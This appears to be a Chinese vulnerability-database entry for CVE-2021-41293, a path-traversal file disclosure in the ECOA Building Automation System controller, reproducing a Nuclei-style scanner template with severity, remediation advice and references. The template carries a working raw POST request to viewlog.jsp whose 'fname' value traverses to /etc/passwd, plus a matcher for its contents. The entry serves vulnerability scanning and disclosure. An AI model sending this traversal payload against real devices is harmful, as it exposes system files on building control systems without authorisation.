漏洞描述
The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
CVE-2021-41293: ECOA Building Automation System - Arbitrary File Retrieval
PoC代码[已公开]
id: CVE-2021-41293
info:
name: ECOA Building Automation System - Arbitrary File Retrieval
author: 0x_Akoko
severity: high
description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41293
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-41293
cwe-id: CWE-22
epss-score: 0.88502
epss-percentile: 0.99477
cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ecoa
product: ecs_router_controller-ecs_firmware
tags: cve2021,cve,ecoa,lfi,disclosure
http:
- raw:
- |
POST /viewlog.jsp HTTP/1.1
Host: {{Hostname}}
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100e3612ab2643ee2053e2d7f7061746750f8d5f8d906ca08448a5c00920b4fb42f022100fc8390b34497ac51d92353014592e12885178abbaa2324f626ad870c54175d81:922c64590222798bb761d5b6d8e72950